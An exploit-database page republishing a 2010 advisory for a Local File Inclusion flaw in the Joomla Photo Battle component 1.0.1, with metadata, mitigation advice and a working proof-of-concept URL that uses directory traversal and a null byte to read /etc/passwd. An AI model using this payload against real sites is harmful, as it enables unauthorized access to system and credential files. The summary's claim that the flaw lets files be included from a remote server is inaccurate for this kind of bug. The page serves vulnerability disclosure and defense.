header-logo
Suggest Exploit
vendor:
Photo Battle
by:
AntiSecurity
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Photo Battle
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:photobattle:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Joomla Component Photo Battle Local File Inclusion Vulnerability

A Local File Inclusion (LFI) vulnerability exists in the Joomla Component Photo Battle version 1.0.1. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to include a file from a remote server that contains malicious code, which can be executed on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to directory traversal attacks. This can be done by validating user input and sanitizing it before using it in file operations.
Source

Exploit-DB raw data:

===========================================================================================================


  [o] Joomla Component Photo Battle Local File Inclusion Vulnerability
 
       Software : com_photobattle version 1.0.1
       Demo     : http://www.gogoritas.net/en/photo-battle
       Author   : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


===========================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_photobattle&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00


===========================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11


===========================================================================================================


  [o] April 14 2010 - GMT +07:00 Jakarta, Indonesia

Navigation

Suggest Exploit

Services By CQR